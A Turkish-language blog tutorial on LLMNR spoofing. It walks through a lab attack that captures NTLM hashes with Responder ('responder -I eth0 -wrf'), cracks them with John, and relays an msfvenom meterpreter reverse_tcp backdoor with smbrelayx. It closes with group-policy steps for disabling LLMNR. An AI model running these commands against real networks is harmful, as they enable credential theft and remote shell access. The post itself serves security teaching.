LLMNR Spoofing Nedir? Ne İşe Yarar? | Webmaster Blog

LLMNR Spoofing Nedir?

LLMNR Spoofing Windows’un bir özelliğinin sömürülmesine dayanan bir zaafiyettir.Bu özellik normalde dns serverda bulunamayan bir adresin diğer cihazlarca bilinip bilinmediğini sorgular. Biz ise bu adresin bizim olduğunu iddia ederek kullanıcının hashini alıp DNS servera yönlendireceğiz.

Ne İşe Yarar?

Llmnr zehirlenmesi zafiyetinde saldırgan kullanıcı adı ve şifrelerin mahalli ağda basit bir halde kendisine vermesini bekler. Llmnr ve nbt-ns görünüşte zararsız bir bileşen olarak görünür ancak aynı sub-netteki makinelerin dns zarar görmüş olduğunde hostu tanımak için birbirlerine yarım etmesini sağlar. Bir makine özel bir hostu çözümlemeye çalışırken DNS çözümü başarısız olduğunda, makine yerel ağdaki diğer makinelere doğru adresi sormak için llmnr yada ntb-ns protokolleri üzerinden istekte bulunur. Bu zararsız bir teori şeklinde görünür ancak büyük bir güvenlik açığı ile saldırganlar bir sistemde tam erişim sağlamak için kullanabilirler.

Windows DNS server 192.168.43.50 ip’li windows server 2012 R2 cihazında kurulu. Saldıracağımız cihaz ise 192.168.43.53 ipsinde , DNS servera bağlı bir Windows server 2012 R2.

Kali cihazımızı 192.168.43.60 ipsine getirip route ayarlarını şekilde göründüğü gibi yaptıktan sonra Respnder toolu ileKod:

responder -I eth0 -wrf

yazarak ağı dinlemeye başlıyoruz.Kurban , olmayan bir dizine istek attığı anda hashi respondera düşüyor.

Not: Artık bu hash’a sahip bir bilgisayar bulunmuyor 

Bu hashi görseldeki gibi john toolu ile kırabilir,veya direk olarak yönlendirerek kullanabiliriz

LLMNR YÖNLENDİRME

Yönlendirmek için impacket reposunun smbrelayx toolunu kullanacağız. Ancak bu tool http vs smb protokollerini kullandığı için /usr/share/responer/Responder.conf dosyasindaki smb ve http özelliklerini deaktif ediyoruz. Ardından msfvenom ile backdoor oluşturuyoruz.Kod:

Msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.60 LPORT=4444 -f exe -o reverse_tcp.exe

Şimdi smbrelayx.py yi kullanarak oluşturduğumuz backdooru kurban cihaza yönlendireceğiz.

Msfconsole’dan gerekli ayarlamaları da yaptıktan sonra responder’ı devreye sokup llmnr isteği bekleyeceğiz.

Windowsta LLMNR servisini devre dışı bırakmak için :

  1. Gpedit.msc’yi çalıştırılır.
  2. Sırasıyla Local Computer Policy -> Computer Configuration -> Administrative Templates -> Network -> DNS Client klasörlerine girilir.
  3. DNS client klasörünün içinden “Turn Off Multicast Name Resolution” seçeneğine çift tıklanır ve “Enabled” seçeneği seçilir.

Aşağıdaki verdiğim kaynaklardan daha fazla bilgi sahibi olabilirsiniz. Diğer makalelerimde görüşmek üzere 🙂

KAYNAKLAR

https://github.com/SpiderLabs/Responder

https://technet.microsoft.com/library/bb878128

https://www.trustwave.com/Resources/SpiderLabs-Blog/Introducing-Responder-1-0/

http://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response

http://www.openwall.com/john/

Leave a Reply

Your email address will not be published. Required fields are marked *